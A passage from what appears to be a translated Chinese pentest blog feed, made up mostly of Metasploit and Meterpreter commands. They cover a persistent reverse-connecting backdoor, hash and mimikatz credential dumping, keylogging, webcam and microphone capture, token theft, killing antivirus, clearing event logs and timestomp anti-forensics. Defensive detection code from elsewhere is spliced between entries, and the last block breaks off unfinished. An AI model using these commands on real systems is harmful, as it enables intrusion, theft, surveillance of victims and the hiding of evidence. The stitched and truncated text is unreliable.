straightforward.</p><h3 id="nmap扫描"><a href="#nmap扫描" class="headerlink" title="nmap扫描"></a>nmap scan</h3><p>Accurate.</p><blockquote><blockquote><p>root@John:~# nmap -sU --script nbstat.nse -p137 192.168.1.0/24 -T4</p></blockquote></blockquote><h3 id="msf扫描-2"><a href="#msf扫描-2" class="headerlink" title="msf扫描"></a>msf scan</h3><p>Inaccurate.</p><blockquote><blockquote><p>msf > use auxiliary/scanner/netbios/nbname</p></blockquote></blockquote><h3 id="nbtscan扫描"><a href="#nbtscan扫描" class="headerlink" title="nbtscan扫描"></a>nbtscan scan</h3><p>Inaccurate.</p><blockquote><blockquote><p>nbtscan -r 192.168.1.0/24<br>nbtscan -v -s: 192.168.1.0/24</p></blockquote></blockquote><h2 id="基于SNMP"><a href="#基于SNMP" class="headerlink" title="基于SNMP"></a>SNMP-based</h2><h3 id="简介-3"><a href="#简介-3" class="headerlink" title="简介"></a>Overview</h3><p>SNMP (Simple Network Management Protocol) is an application-layer protocol in the five-layer TCP/IP model, used for network management, mainly of network devices. It consists of two main parts: the SNMP manager and the SNMP agent. The manager is a central node that collects and maintains information about each SNMP element, processes it and reports to the network administrator; an agent runs on each managed node, gathers that node's statistics, exchanges messages with the manager, receives and executes the manager's commands and uploads local network information.</p><h3 id="namp扫描-2"><a href="#namp扫描-2" class="headerlink" title="namp扫描"></a>nmap scan</h3><p>Garbage.</p><blockquote><blockquote><p>nmap -sU --script snmp-brute 192.168.1.0/24 -T4</p></blockquote></blockquote><h3 id="msf扫描-3"><a href="#msf扫描-3" class="headerlink" title="msf扫描"></a>msf scan</h3><blockquote><blockquote><p>msf > use auxiliary/scanner/snmp/snmp_enum</p></blockquote></blockquote><h2 id="基于ICMP"><a href="#基于ICMP" class="headerlink" title="基于ICMP"></a>ICMP-based</h2><h3 id="简介-4"><a href="#简介-4" class="headerlink" title="简介"></a>Overview</h3><p>ICMP is a sub-protocol of the TCP/IP family used to pass control messages between IP hosts and routers. Control messages concern the network itself: whether the network is reachable, whether a host is up, whether a route is available, and so on. They carry no user data, but they play an important role in delivering user data.</p><h3 id="nmap扫描-1"><a href="#nmap扫描-1" class="headerlink" title="nmap扫描"></a>nmap scan</h3><p>fail????</p><blockquote><blockquote><p>nmap -sP -PI 192.168.1.0/24 -T4<br>nmap -sn -PE -T4 192.168.1.0/24</p></blockquote></blockquote><h2 id="基于SMB"><a href="#基于SMB" class="headerlink" title="基于SMB"></a>SMB-based</h2><h3 id="msf扫描-4"><a href="#msf扫描-4" class="headerlink" title="msf扫描"></a>msf scan</h3><blockquote><blockquote><p>scanner/smb/smb_version</p></blockquote></blockquote><h2 id="基于msf"><a href="#基于msf" class="headerlink" title="基于msf"></a>msf-based</h2><p>Search for scanner modules:</p><blockquote><blockquote><p>search scanner type:auxiliary</p></blockquote></blockquote><ul><li>auxiliary/scanner/discovery/arp_sweep</li><li>auxiliary/scanner/discovery/udp_sweep</li><li>auxiliary/scanner/ftp/ftp_version</li><li>auxiliary/scanner/http/http_version</li><li>auxiliary/scanner/smb/smb_version</li><li>auxiliary/scanner/ssh/ssh_version</li><li>auxiliary/scanner/telnet/telnet_version</li><li>auxiliary/scanner/discovery/udp_probe</li><li>auxiliary/scanner/dns/dns_amp</li><li>auxiliary/scanner/mysql/mysql_version</li></ul>]]></content>
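All of the ARP-based discovery tools listed above (nmap -PR, arp_sweep, netdiscover, arp-scan) leave the same footprint: one sender bursting ARP who-has requests for most of a subnet. The detector below is an added example, not code from the original post or from any of those tools; it assumes ARP traffic recorded with `tcpdump -n arp`, and the capture it runs over is constructed.

```python
import re
from collections import defaultdict, deque

# Input format assumed: one ARP packet per line as printed by `tcpdump -n arp`.
# The capture used below is constructed for this example, not a real one.
ARP_REQUEST = re.compile(
    r"^(\d{2}):(\d{2}):(\d{2})\.(\d+) ARP, Request who-has (\S+) tell (\S+),"
)


def parse_request(line):
    """Return (seconds since midnight, sender_ip, target_ip) for an ARP request, else None."""
    m = ARP_REQUEST.match(line)
    if m is None:          # replies, gratuitous ARP and non-ARP lines are ignored
        return None
    h, mi, s, frac, target, sender = m.groups()
    ts = int(h) * 3600 + int(mi) * 60 + int(s) + int(frac) / 10 ** len(frac)
    return ts, sender, target


def find_arp_sweeps(lines, window=5.0, threshold=20):
    """Return {sender_ip: peak_distinct_targets} for senders that asked for at
    least `threshold` different IPs within any `window`-second span.

    A scanner emits who-has requests covering most of a subnet in a burst;
    an ordinary host resolves a handful of peers spread over minutes.
    """
    recent = defaultdict(deque)   # sender -> (ts, target) pairs, oldest first
    peak = defaultdict(int)
    for line in lines:
        parsed = parse_request(line)
        if parsed is None:
            continue
        ts, sender, target = parsed
        q = recent[sender]
        q.append((ts, target))
        while ts - q[0][0] > window:   # expire requests older than the window
            q.popleft()
        distinct = len({t for _, t in q})
        if distinct > peak[sender]:
            peak[sender] = distinct
    return {s: n for s, n in peak.items() if n >= threshold}


def sample_capture():
    """Constructed capture: .10 sweeps 192.168.1.1-40 in two seconds (a scanner),
    .20 resolves three peers over a minute (ordinary traffic)."""
    lines = ["12:00:00.500000 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:55, length 28"]
    for i in range(1, 41):
        micro = 1_000_000 + i * 50_000          # one request every 50 ms from 12:00:01
        lines.append("12:00:%02d.%06d ARP, Request who-has 192.168.1.%d tell 192.168.1.10, length 28"
                     % (micro // 1_000_000, micro % 1_000_000, i))
    for sec, peer in ((0, 1), (30, 5), (60, 7)):
        lines.append("12:%02d:%02d.000000 ARP, Request who-has 192.168.1.%d tell 192.168.1.20, length 28"
                     % (sec // 60, sec % 60, peer))
    return lines


if __name__ == "__main__":
    for sender, n in find_arp_sweeps(sample_capture()).items():
        print("ARP sweep: %s asked for %d distinct hosts" % (sender, n))
```

Tune `window` and `threshold` to the subnet size; a /24 swept by nmap -PR completes well inside five seconds.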
<category term="渗透测试" scheme="http://yoursite.com/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
<category term="metasploit" scheme="http://yoursite.com/tags/metasploit/"/>
<category term="内网渗透" scheme="http://yoursite.com/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/"/>
</entry>
<entry>
<title>Pentest Notes 2: Commonly Used MSF Modules</title>
<link href="http://yoursite.com/2019/10/03/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E7%AC%94%E8%AE%B02-MSF%E5%B8%B8%E7%94%A8%E6%A8%A1%E5%9D%97%E8%AE%B0%E5%BD%95/"/>
<id>http://yoursite.com/2019/10/03/渗透测试笔记2-MSF常用模块记录/</id>
<published>2019-10-03T08:30:49.000Z</published>
<updated>2019-10-03T08:31:29.076Z</updated>
<content type="html"><![CDATA[<h3 id="运行自动化脚本"><a href="#运行自动化脚本" class="headerlink" title="运行自动化脚本"></a>Run an automation script</h3><blockquote><blockquote><p>msfconsole -r auto.rc</p></blockquote></blockquote><h3 id="检测是否为虚拟机"><a href="#检测是否为虚拟机" class="headerlink" title="检测是否为虚拟机"></a>Check whether the target is a virtual machine</h3><blockquote><blockquote><p>post/windows/gather/checkvm</p></blockquote></blockquote><h3 id="获取磁盘信息"><a href="#获取磁盘信息" class="headerlink" title="获取磁盘信息"></a>Get disk information</h3><blockquote><blockquote><p>windows/gather/forensics/enum_drives</p></blockquote></blockquote><h3 id="补丁信息"><a href="#补丁信息" class="headerlink" title="补丁信息"></a>Patch information</h3><blockquote><blockquote><p>run post/windows/gather/enum_patches</p></blockquote></blockquote><h3 id="事务日志"><a href="#事务日志" class="headerlink" title="事务日志"></a>Event logs</h3><p>View:</p><blockquote><blockquote><p>run event_manager -i</p></blockquote></blockquote><p>Clear:</p><blockquote><blockquote><p>run event_manager -c</p></blockquote></blockquote><h3 id="获取敏感信息"><a href="#获取敏感信息" class="headerlink" title="获取敏感信息"></a>Gather sensitive information</h3><p>run post/windows/gather/enum_applications # list installed software</p><p>run post/windows/gather/dumplinks # recent file activity</p><p>run post/windows/gather/enum_ie # IE cache</p><p>run post/windows/gather/enum_chrome # Chrome cache</p><p>run post/windows/gather/enum_shares # list current and historical shares</p><p>run enum_vmware # list VMware configuration files and products</p><p>run scraper # collect network shares and other information from the target</p><p>run getcountermeasure # list HIPS and AV processes, show the remote machine's firewall rules, list the DEP and UAC policy</p><p>run hashdump # dump password hashes</p><p>run windows/gather/smart_hashdump # dump hashes, more capable</p><p>run keylogrecorder # record keystrokes</p><p>run get_env # get every user's environment variables</p><p>run getvncpw # get VNC account passwords</p><h2 id="网络信息"><a href="#网络信息" class="headerlink" title="网络信息"></a>Network information</h2><p>run packetrecorder # capture and record all network traffic on the target; -i 1 selects the interface to record on</p><p>run get_local_subnets # get the local subnets</p><p>run arp_scanner -r 192.168.1.0/24 # ARP scan for live hosts</p><h2 id="绕过防火墙"><a href="#绕过防火墙" class="headerlink" title="绕过防火墙"></a>Bypass the firewall</h2><p>run killav # terminate AV processes; quickly clears our tracks and the records of the penetration test</p><p>run getcountermeasure # list HIPS and AV processes, show the XP firewall rules and the DEP and UAC policy<br>PS: the -k option kills the protection software's processes</p><h2 id="持久后门"><a href="#持久后门" class="headerlink" title="持久后门"></a>Persistent backdoor</h2><p>run persistence # install a persistent backdoor<br><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">-A  Automatically start a matching exploit/multi/handler to connect to the agent</span><br><span class="line">-L  Location in the target host where the payload is written, if not %TEMP%</span><br><span class="line">-P  Payload to use, default windows/meterpreter/reverse_tcp</span><br><span class="line">-S  Automatically start the agent as a service (with SYSTEM privileges)</span><br><span class="line">-T  Alternate executable template to use</span><br><span class="line">-U  Automatically start the agent when the user logs on</span><br><span class="line">-X  Automatically start the agent when the system boots</span><br><span class="line">-h  This help menu</span><br><span class="line">-i  Interval in seconds between connection attempts</span><br><span class="line">-p  Port on which the system running Metasploit is listening</span><br><span class="line">-r  IP of the system running Metasploit that listens for the connection</span><br></pre></td></tr></table></figure></p><blockquote><blockquote><p>run persistence -U -i 5 -p 443 -r 192.168.1.71</p></blockquote></blockquote><h2 id="开启远程桌面"><a href="#开启远程桌面" class="headerlink" title="开启远程桌面"></a>Enable remote desktop</h2><blockquote><blockquote><p>run post/windows/manage/enable_rdp</p></blockquote></blockquote><p>run win32-sshserver # install an OpenSSH service</p><p>run vnc # view the remote desktop</p><h2 id="一些常用的破解模块"><a href="#一些常用的破解模块" class="headerlink" title="一些常用的破解模块"></a>Some commonly used brute-force modules</h2><p>auxiliary/scanner/mssql/mssql_login</p><p>auxiliary/scanner/ftp/ftp_login</p><p>auxiliary/scanner/ssh/ssh_login</p><p>auxiliary/scanner/telnet/telnet_login</p><p>auxiliary/scanner/smb/smb_login</p><p>auxiliary/scanner/mysql/mysql_login</p><p>auxiliary/scanner/oracle/oracle_login</p><p>auxiliary/scanner/postgres/postgres_login</p><p>auxiliary/scanner/vnc/vnc_login</p><p>auxiliary/scanner/pcanywhere/pcanywhere_login</p><p>auxiliary/scanner/snmp/snmp_login</p><p>auxiliary/scanner/ftp/anonymous</p><h2 id="一些好用的模块"><a href="#一些好用的模块" class="headerlink" title="一些好用的模块"></a>Some useful modules</h2><p>auxiliary/admin/realvnc_41_bypass (bypass for VNC v4; exploit tools for it are also available online)</p><p>auxiliary/admin/cisco/cisco_secure_acs_bypass (Cisco bypass, version 5.1 or unpatched 5.2; a fairly old bug)</p><p>auxiliary/admin/http/jboss_deploymentfilerepository (a favourite when JBoss turns up on an internal network :))</p><p>auxiliary/admin/http/dlink_dir_300_600_exec_noauth (D-Link command execution :)</p><p>auxiliary/admin/mssql/mssql_exec (execute commands with a brute-forced weak sa password; no output :()</p><p>auxiliary/scanner/http/jboss_vulnscan (JBoss, a good friend in internal network pentests)</p><p>auxiliary/admin/mysql/mysql_sql (execute SQL statements with a brute-forced weak password :)</p><p>auxiliary/admin/oracle/post_exploitation/win32exec (Win32 command execution with a brute-forced Oracle password)</p><p>auxiliary/admin/postgres/postgres_sql (execute SQL statements with a brute-forced postgres user)</p><p>auxiliary/scanner/rsync/modules_list (Rsync)</p><p>auxiliary/scanner/misc/redis_server (Redis)</p><p>auxiliary/scanner/ssl/openssl_heartbleed (Heartbleed)</p><p>auxiliary/scanner/mongodb/mongodb_login (MongoDB)</p><p>auxiliary/scanner/elasticsearch/indices_enum (Elasticsearch)</p><p>auxiliary/scanner/http/axis_local_file_include (Axis local file inclusion)</p><p>auxiliary/scanner/http/http_put (HTTP PUT)</p><p>auxiliary/scanner/http/gitlab_user_enum (enumerate internal GitLab users)</p><p>auxiliary/scanner/http/jenkins_enum (enumerate internal Jenkins users)</p><p>auxiliary/scanner/http/svn_scanner (SVN hunter :))</p><p>auxiliary/scanner/http/tomcat_mgr_login (Tomcat brute force)</p><p>auxiliary/scanner/http/zabbix_login (Zabbix :))</p><h2 id="权限提升"><a href="#权限提升" class="headerlink" title="权限提升"></a>Privilege escalation</h2><h4 id="ms10-073-ms10-092"><a href="#ms10-073-ms10-092" class="headerlink" title="ms10-073\ms10-092"></a>ms10-073\ms10-092</h4><h4 id="ms14-002"><a href="#ms14-002" class="headerlink" title="ms14-002"></a>ms14-002</h4><p>Windows XP<br>Windows Server 2003</p><h4 id="ms15-001"><a href="#ms15-001" class="headerlink" title="ms15-001"></a>ms15-001</h4><h4 id="ms15-051"><a href="#ms15-051" class="headerlink" title="ms15_051"></a>ms15_051</h4><p>Microsoft Windows Vista<br>Microsoft Windows Server 2012 R2<br>Microsoft Windows Server 2012<br>Microsoft Windows Server 2008 R2<br>Microsoft Windows Server 2008<br>Microsoft Windows Server 2003<br>Microsoft Windows RT 8.1<br>Microsoft Windows RT<br>Microsoft Windows 8.1<br>Microsoft Windows 8<br>Microsoft Windows 7</p><h4 id="ms16-016"><a href="#ms16-016" class="headerlink" title="ms16-016"></a>ms16-016</h4><p>According to Microsoft, this vulnerability exists on:</p><p>Windows Vista SP2<br>Windows Server 2008 x86 & x64<br>Windows Server 2008 R2 x64<br>Windows 7 x86 & x64<br>Windows 8.1 x86 & x64</p><p>where it elevates privileges to SYSTEM; on the following systems it causes a denial of service (blue screen):</p><p>Windows Server 2012<br>Windows Server 2012 R2<br>Windows RT 8.1<br>Windows 10</p><h4 id="ms16-032"><a href="#ms16-032" class="headerlink" title="ms16-032"></a>ms16-032</h4><p>Multiple exploits available.</p><h4 id="MS16-075-烂土豆"><a href="#MS16-075-烂土豆" class="headerlink" title="MS16-075(烂土豆)"></a>MS16-075 (Rotten Potato)</h4><p>Works on all versions.</p><h4 id="ms"><a href="#ms" class="headerlink" title="ms"></a>ms</h4><h4 id="UAC提权"><a href="#UAC提权" class="headerlink" title="UAC提权"></a>UAC privilege escalation</h4><h5 id="提高程序运行级别(runas)"><a href="#提高程序运行级别(runas)" class="headerlink" title="提高程序运行级别(runas)"></a>Raise the program's run level (runas)</h5><p>exploit/windows/local/ask</p><h5 id="绕过UAC"><a href="#绕过UAC" class="headerlink" title="绕过UAC"></a>Bypass UAC</h5><p>exploit/windows/local/bypassuac</p><blockquote><blockquote><p>After the module succeeds, getuid still shows an ordinary user; don't be disheartened, run getsystem and check again: UAC has been bypassed and the session now has SYSTEM privileges.</p></blockquote></blockquote><h4 id="CVE-2018-8120"><a href="#CVE-2018-8120" class="headerlink" title="CVE-2018-8120"></a>CVE-2018-8120</h4><p>Microsoft Windows Server 2008 R2 for x64-based Systems SP1<br>Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1<br>Microsoft Windows Server 2008 for x64-based Systems SP2<br>Microsoft Windows Server 2008 for Itanium-based Systems SP2<br>Microsoft Windows Server 2008 for 32-bit Systems SP2<br>Microsoft Windows 7 for x64-based Systems SP1<br>Microsoft Windows 7 for 32-bit Systems SP1</p><h4 id="mysql-提权"><a href="#mysql-提权" class="headerlink" title="mysql 提权"></a>mysql privilege escalation</h4><p>mysql_mof # MOF-based privilege escalation</p><h2 id="远程代码执行"><a href="#远程代码执行" class="headerlink" title="远程代码执行"></a>Remote code execution</h2><h4 id="ms15-020"><a href="#ms15-020" class="headerlink" title="ms15-020"></a>ms15-020</h4><p>Generates a .lnk file for a share</p>]]></content>
<category term="渗透测试" scheme="http://yoursite.com/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
<category term="metasploit" scheme="http://yoursite.com/tags/metasploit/"/>
</entry>
<entry>
<title>Pentest Notes 1: Meterpreter Post-Exploitation</title>
<link href="http://yoursite.com/2019/10/03/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E7%AC%94%E8%AE%B01-Meterpreter%E5%90%8E%E6%B8%97%E9%80%8F/"/>
<id>http://yoursite.com/2019/10/03/渗透测试笔记1-Meterpreter后渗透/</id>
<published>2019-10-03T07:58:35.000Z</published>
<updated>2019-10-03T08:01:26.927Z</updated>
<content type="html"><![CDATA[<h2 id="基本命令"><a href="#基本命令" class="headerlink" title="基本命令"></a>Basic commands</h2><h4 id="background"><a href="#background" class="headerlink" title="background"></a>background</h4><p>Hides the meterpreter session in the background so that msf can carry out other tasks.</p><h4 id="sessions"><a href="#sessions" class="headerlink" title="sessions"></a>sessions</h4><p>List the sessions obtained so far; sessions -i interacts with one of them.</p><h4 id="quit"><a href="#quit" class="headerlink" title="quit"></a>quit</h4><p>Close the current session and return to the msf console.</p><h4 id="shell"><a href="#shell" class="headerlink" title="shell"></a>shell</h4><p>Get a console shell on the system.</p><h4 id="reboot"><a href="#reboot" class="headerlink" title="reboot"></a>reboot</h4><p>Reboot the victim's computer.</p><h4 id="irb"><a href="#irb" class="headerlink" title="irb"></a>irb</h4><p>Interact with a Ruby shell; Metasploit's wrapped functions can be called directly, e.g.:</p><blockquote><blockquote><p>client.sys.config.sysinfo()</p></blockquote></blockquote><p>Load Metasploit's Railgun extension to call the Windows API directly:</p><blockquote><blockquote><p>client.core.use("railgun")<br>client.railgun.user32.MessageBox(0, "hello world!", nil, "MB_OK")</p></blockquote></blockquote><h4 id="clearev-clearav"><a href="#clearev-clearav" class="headerlink" title="clearev/clearav"></a>clearev/clearav</h4><p>Clear the event logs on the target system.</p><h4 id="idletime"><a href="#idletime" class="headerlink" title="idletime"></a>idletime</h4><p>Show how long the target machine has been idle (no user input).</p><h4 id="基于MACE时间的反电子取证"><a href="#基于MACE时间的反电子取证" class="headerlink" title="基于MACE时间的反电子取证"></a>MACE-timestamp anti-forensics</h4><p>timestomp -v secist.txt # view the target file's MACE times<br>timestomp c:/a.doc -c "10/27/2015 14:22:11" # modify the file's creation time (anti-forensics)<br>timestomp -f c:\\AVScanner.ini secist.txt # copy the template file's MACE times onto the current file</p><h2 id="文件命令"><a href="#文件命令" class="headerlink" title="文件命令"></a>File commands</h2><h4 id="cat"><a href="#cat" class="headerlink" title="cat"></a>cat</h4><p>View a file; note that backslashes must be doubled, e.g.:</p><blockquote><blockquote><p>cat c:\\boot.ini</p></blockquote></blockquote><h4 id="getwd"><a href="#getwd" class="headerlink" title="getwd"></a>getwd</h4><p>Get the current working directory on the target.</p><h4 id="upload"><a href="#upload" class="headerlink" title="upload"></a>upload</h4><p>Upload a file to the target:</p><blockquote><blockquote><p>upload net.exe c:\\</p></blockquote></blockquote><h4 id="download"><a href="#download" class="headerlink" title="download"></a>download</h4><p>Download a file:</p><blockquote><blockquote><p>download xxx.txt /tmp</p></blockquote></blockquote><h4 id="edit"><a href="#edit" class="headerlink" title="edit"></a>edit</h4><p>Edit a file with vim, e.g. the hosts file.</p><h4 id="search"><a href="#search" class="headerlink" title="search"></a>search</h4><p>Search for files.</p><h2 id="网络命令"><a href="#网络命令" class="headerlink" title="网络命令"></a>Network commands</h2><h4 id="ipconfig"><a href="#ipconfig" class="headerlink" title="ipconfig"></a>ipconfig</h4><p>Get network interface information.</p><h4 id="portfwd"><a href="#portfwd" class="headerlink" title="portfwd"></a>portfwd</h4><p>Port forwarding:</p><blockquote><blockquote><p>portfwd add -l 1234 -p 3389 -r 192.168.10.142</p></blockquote></blockquote><p>Then use Kali's rdesktop to connect to local port 1234, which is forwarded to port 3389 on the remote host:</p><blockquote><blockquote><p>rdesktop -u admin -p 1234 127.0.0.1:1234</p></blockquote></blockquote><h4 id="route"><a href="#route" class="headerlink" title="route"></a>route</h4><p>Show the target host's routing information.</p><h4 id="run-get-local-subnets"><a href="#run-get-local-subnets" class="headerlink" title="run get_local_subnets"></a>run get_local_subnets</h4><p>Show the internal IP ranges of the compromised host.</p><h4 id="添加一条通向目标服务器内网的路由"><a href="#添加一条通向目标服务器内网的路由" class="headerlink" title="添加一条通向目标服务器内网的路由"></a>Add a route into the target server's internal network</h4><p>Check the shell's network environment:</p><blockquote><blockquote><p>meterpreter > run get_local_subnets</p></blockquote></blockquote><p>Add a route into the target server's internal network:</p><blockquote><blockquote><p>meterpreter > run autoroute -s 100.0.0.0/8 # (depends on the target's internal network)</p></blockquote></blockquote><p>Check the routing setup:</p><blockquote><blockquote><p>meterpreter > run autoroute -p</p></blockquote></blockquote><p>Usually, setting the route in meterpreter is enough to reach the internal network. Sometimes it still fails; in that case, background to the msf> prompt and check the routes there.</p><blockquote><blockquote><p>route print</p></blockquote></blockquote><p>If no route is shown, the route set in the meterpreter shell did not take effect, and it can be added in msf:</p><blockquote><blockquote><p>msf > route add 10.0.0.0 255.0.0.0 1</p></blockquote></blockquote><p>Explanation: the 1 is session 1. When the attacking machine wants to reach resources in 10.0.0.0/8, its next hop is session 1 (what a next hop is will not be covered here); in short, the attacking machine can now reach internal resources.</p><h4 id="内网代理"><a href="#内网代理" class="headerlink" title="内网代理"></a>Internal network proxy</h4><p>msf exploit(handler) > use auxiliary/server/socks4a</p><p>msf auxiliary(socks4a) > route print</p><p>msf auxiliary(socks4a) > ifconfig</p><p>msf auxiliary(socks4a) > set SRVHOST xxx.xxx.xx.xx # xxx.xxx.xx.xx is our own VPS running msf</p><p>msf auxiliary(socks4a) > exploit</p><p>proxychains nmap 192.168.1.0/24</p><h2 id="系统命令"><a href="#系统命令" class="headerlink" title="系统命令"></a>System commands</h2><h4 id="ps"><a href="#ps" class="headerlink" title="ps"></a>ps</h4><p>Show process information.</p><h4 id="migrate"><a href="#migrate" class="headerlink" title="migrate"></a>migrate</h4><p>Migrate meterpreter into another process's address space, e.g. migrate 304.</p><h4 id="execute"><a href="#execute" class="headerlink" title="execute"></a>execute</h4><p>Execute a command on the target.<br><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">meterpreter > execute</span><br><span class="line">Usage: execute -f file [options]</span><br><span class="line">Executes a command on the remote machine.</span><br><span class="line"></span><br><span class="line">OPTIONS:</span><br><span class="line"></span><br><span class="line">    -H        Create the process hidden from view.</span><br><span class="line">    -a <opt>  The arguments to pass to the command.</span><br><span class="line">    -c        Channelized I/O (required for interaction).</span><br><span class="line">    -d <opt>  The 'dummy' executable to launch when using -m.</span><br><span class="line">    -f <opt>  The executable command to run.</span><br><span class="line">    -h        Help menu.</span><br><span class="line">    -i        Interact with the process after creating it.</span><br><span class="line">    -k        Execute process on the meterpreters current desktop</span><br><span class="line">    -m        Execute from memory.</span><br><span class="line">    -s <opt>  Execute process in a given session as the session user</span><br><span class="line">    -t        Execute process with currently impersonated thread token</span><br></pre></td></tr></table></figure></p><p>Examples:</p><blockquote><blockquote><p>execute -H -f cmd.exe # run cmd.exe hidden<br>execute -H -i -f cmd.exe # interact with cmd</p></blockquote></blockquote><p>The -m option executes directly from memory and leaves fewer traces.</p><h4 id="getpid"><a href="#getpid" class="headerlink" title="getpid"></a>getpid</h4><p>Get the PID of the current session's process.</p><h4 id="kill"><a href="#kill" class="headerlink" title="kill"></a>kill</h4><p>Terminate the specified process.</p><h4 id="getuid"><a href="#getuid" class="headerlink" title="getuid"></a>getuid</h4><p>Show the current user name, and thereby the privileges the session has.</p><h4 id="sysinfo"><a href="#sysinfo" class="headerlink" title="sysinfo"></a>sysinfo</h4><p>Get information about the target system.</p><h4 id="shutdown"><a href="#shutdown" class="headerlink" title="shutdown"></a>shutdown</h4><p>Shut down the target host.</p><h2 id="植入后门"><a href="#植入后门" class="headerlink" title="植入后门"></a>Implanting a backdoor</h2><h4 id="persistence"><a href="#persistence" class="headerlink" title="persistence"></a>persistence</h4><p>Writes registry keys to maintain access.</p><blockquote><blockquote><p>run persistence -U -i 5 -p 443 -r 192.168.1.71</p></blockquote></blockquote><h4 id="metsvc"><a href="#metsvc" class="headerlink" title="metsvc"></a>metsvc</h4><p>Installs on the host as a system service.</p><h4 id="getgui"><a href="#getgui" class="headerlink" title="getgui"></a>getgui</h4><p>Enable remote desktop:</p><blockquote><blockquote><p>run getgui -u xxxxx -p xxxxxx</p></blockquote></blockquote><p>Open port 3389:</p><blockquote><blockquote><p>run getgui -e</p></blockquote></blockquote><h2 id="提升权限"><a href="#提升权限" class="headerlink" title="提升权限"></a>Privilege escalation</h2><h4 id="getsystem-命令"><a href="#getsystem-命令" class="headerlink" title="getsystem 命令"></a>getsystem command</h4><p>Escalation: ms09-012\ms10-015</p><h4 id="ms10-073-ms10-092"><a href="#ms10-073-ms10-092" class="headerlink" title="ms10-073\ms10-092"></a>ms10-073\ms10-092</h4><h2 id="键盘监听"><a href="#键盘监听" class="headerlink" title="键盘监听"></a>Keystroke logging</h2><p>Meterpreter can also log keystrokes on the target device; keystroke logging mainly involves these three commands:</p><p>keyscan_start: start keystroke logging</p><p>keyscan_dump: display the captured keystrokes</p><p>keyscan_stop: stop keystroke logging</p><p>uictl enable keyboard/mouse # take over the target's keyboard and mouse</p><p>meterpreter > keyscan_start # start keystroke logging on the remote target</p><p>Starting the keystroke sniffer...</p><p>meterpreter > keyscan_dump # dump the keystrokes captured on the target</p><p>meterpreter > keyscan_stop # stop keystroke logging on the target</p><h2 id="mimikatz"><a href="#mimikatz" class="headerlink" title="mimikatz"></a>mimikatz</h2><p>meterpreter > load mimikatz # load mimikatz</p><p>meterpreter > msv # get hashes</p><p>meterpreter > kerberos # get plaintext credentials</p><p>meterpreter > ssp # get plaintext credentials</p><p>meterpreter > wdigest # get system account information</p><p>meterpreter > mimikatz_command -f a:: # passing an invalid module lists all modules</p><p>meterpreter > mimikatz_command -f samdump:: # list the samdump subcommands</p><p>meterpreter > mimikatz_command -f samdump::hashes # dump the target's hashes</p><p>meterpreter > mimikatz_command -f handle::list # list processes</p><p>meterpreter > mimikatz_command -f service::list # list services</p><h2 id="网络嗅探"><a href="#网络嗅探" class="headerlink" title="网络嗅探"></a>Network sniffing</h2><p>meterpreter > use sniffer # load the sniffer module</p><p>meterpreter > sniffer_interfaces # list all network interfaces on the target</p><p>meterpreter > sniffer_start ID # start capturing on interface ID</p><p>meterpreter > sniffer_dump ID FILEPATH # write the packets captured on interface ID to a pcap file</p><p>meterpreter > sniffer_stop ID # stop sniffing</p><p>Decode the captured packets:<br><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">use auxiliary/sniffer/psnuffle</span><br><span class="line">set pcapfile 1.cap</span><br><span class="line">run</span><br></pre></td></tr></table></figure></p><h2 id="捕捉屏幕"><a href="#捕捉屏幕" class="headerlink" title="捕捉屏幕"></a>Screen capture</h2><p>screenshot # take a screenshot and store it on our system</p><p>run vnc # pops up a window showing the target's current desktop; the remote machine can be controlled from it</p><h2 id="盗取令牌"><a href="#盗取令牌" class="headerlink" title="盗取令牌"></a>Token theft</h2><p>meterpreter > use incognito # load incognito (used to steal tokens from the target host or impersonate users)</p><p>meterpreter > list_tokens -u # list the user tokens available on the target</p><p>meterpreter > list_tokens -g # list the group tokens available on the target</p><p>meterpreter > impersonate_token DOMAIN_NAME\\USERNAME # impersonate an available token, e.g. meterpreter > impersonate_token QLWEB\\Administrator</p><p>meterpreter > execute -f cmd.exe -i -t # spawn a shell with the domain token</p><p>meterpreter > getuid</p><p>meterpreter > add_user 0xfa funny -h 192.168.3.98 # add an account on the domain controller</p><p>meterpreter > reg command # interact with the target's registry: create, delete, query and so on</p><p>meterpreter > setdesktop number # switch to another user's desktop (depends on which users are logged on)</p><p>meterpreter > ps # list the target's processes and find the PID of one running as the domain account</p><p>meterpreter > steal_token pid # steal the given process's token and impersonate it</p><p>meterpreter > drop_token pid # stop impersonating the current token</p><h2 id="网络摄像头"><a href="#网络摄像头" class="headerlink" title="网络摄像头"></a>Webcam</h2><p>record_mic # record audio</p><p>webcam_chat # view the webcam interface</p><p>webcam_list # list webcams</p><p>webcam_stream # stream video from the webcam</p><p>webcam_snap # take a picture with the target's webcam and save it locally as an image</p><h2 id="内网扫描"><a href="#内网扫描" class="headerlink" title="内网扫描"></a>Internal network scanning</h2><h4 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>Port scan</h4><blockquote><blockquote><p>use auxiliary/scanner/portscan/tcp</p></blockquote></blockquote><h4 id="存活主机扫描"><a href="#存活主机扫描" class="headerlink" title="存活主机扫描"></a>Live host scan</h4><blockquote><blockquote><p>run arp_scanner -r 192.168.1.0/24</p></blockquote></blockquote><h2 id="绕过UAC"><a href="#绕过UAC" class="headerlink" title="绕过UAC"></a>Bypass UAC</h2><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">msf>use exploit/windows/local/ask</span><br><span class="line"></span><br><span class="line">msf>show options</span><br><span class="line"></span><br><span class="line">msf>set session 1</span><br><span class="line"></span><br><span class="line">msf>exploit</span><br></pre></td></tr></table></figure>]]></content>
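The persistence script described in both notes above (the options table in the MSF modules post, and "run persistence -U ..." here) keeps access through a registry autorun entry with its payload written to %TEMP% unless -L says otherwise. The audit below is an added example, not code from the original posts or from Metasploit; it parses `reg query` output for a Run key and flags entries that execute from a temp directory or through a script host. The sample registry output and the flagging heuristics are constructed assumptions.

```python
import re

# Constructed sample of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
# output (not from a real machine): one legitimate entry and two that launch
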